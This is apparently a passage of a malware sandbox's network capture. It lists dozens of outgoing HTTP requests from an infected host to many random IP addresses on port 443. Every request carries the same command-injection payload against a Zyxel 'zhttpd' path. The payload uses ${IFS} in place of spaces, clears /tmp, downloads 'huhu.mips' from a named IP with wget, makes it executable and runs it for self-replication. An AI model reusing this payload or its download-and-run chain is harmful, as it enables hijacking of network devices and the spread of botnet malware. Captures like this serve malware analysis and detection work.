                                            Feb 2, 2024 06:21:02.439464092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1874192.168.2.156050280.178.56.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439524889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1875192.168.2.15580048.66.65.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439541101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1876192.168.2.1557786102.142.43.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439595938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1877192.168.2.1540798140.166.48.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439635038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1878192.168.2.1547500183.243.116.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439670086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1879192.168.2.1536664143.48.249.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439704895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1880192.168.2.1551440134.113.30.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.439814091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1881192.168.2.1543712165.13.58.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.440123081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1882192.168.2.155714245.143.231.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443072081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1883192.168.2.155949244.112.6.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443100929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1884192.168.2.155603847.232.140.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443167925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1885192.168.2.1545264172.70.196.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443202972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1886192.168.2.154566836.164.25.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443239927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1887192.168.2.154795645.167.217.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443299055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1888192.168.2.1556136179.58.91.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443327904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1889192.168.2.1546286212.160.179.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443358898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1890192.168.2.1546130174.127.134.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443408012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1891192.168.2.155108299.161.44.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443450928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1892192.168.2.155199232.108.88.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443485022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1893192.168.2.1533060154.9.211.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443512917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1894192.168.2.1555010133.83.42.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443538904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1895192.168.2.154224293.243.106.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443583012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1896192.168.2.153357281.254.214.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443617105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1897192.168.2.1547574208.156.194.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443655968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1898192.168.2.155532647.57.185.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.443687916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1899192.168.2.1542146143.13.172.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.451718092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1900192.168.2.1538186193.82.77.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.451755047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1901192.168.2.1556024126.80.191.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.451782942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1902192.168.2.155229657.111.254.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.451823950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1903192.168.2.155921038.40.197.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.451834917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1904192.168.2.155136649.88.3.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.451886892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1905192.168.2.1547600154.15.71.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.451903105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1906192.168.2.1554254203.202.102.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.451956034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1907192.168.2.1549782144.182.134.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.451982975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1908192.168.2.1549254129.82.55.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452038050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1909192.168.2.15584644.116.11.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452191114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1910192.168.2.1543666171.210.0.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452219963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1911192.168.2.1554700111.12.112.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452253103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1912192.168.2.1543310144.109.123.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452306032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1913192.168.2.154617879.141.242.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452331066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1914192.168.2.1560350201.171.252.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452359915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1915192.168.2.154454297.189.202.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452428102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1916192.168.2.155788423.49.168.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452461958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1917192.168.2.1546538117.182.60.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452503920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1918192.168.2.154223449.109.186.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452529907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1919192.168.2.1550058140.169.212.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452565908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1920192.168.2.1558166108.137.180.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452605963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1921192.168.2.156049267.209.32.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452652931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1922192.168.2.1548094213.33.17.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452692032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1923192.168.2.1552192166.4.141.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452723980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1924192.168.2.1542244108.76.217.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452761889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1925192.168.2.1544518103.203.83.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452805042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1926192.168.2.1560966105.241.201.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452840090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1927192.168.2.1549908121.174.24.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452881098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1928192.168.2.1533914137.9.51.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452927113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1929192.168.2.1538710169.168.55.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.452966928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1930192.168.2.1546706102.179.23.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453013897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1931192.168.2.1546518190.87.0.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453047037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1932192.168.2.154060077.162.54.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453090906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1933192.168.2.1549262108.208.204.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453134060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1934192.168.2.1534736218.127.107.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453172922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1935192.168.2.1549892159.222.30.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453212976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1936192.168.2.1554632177.149.105.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:03.453259945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1937192.168.2.1556412207.135.123.58443
                                            TimestampBytes transferredDirectionData
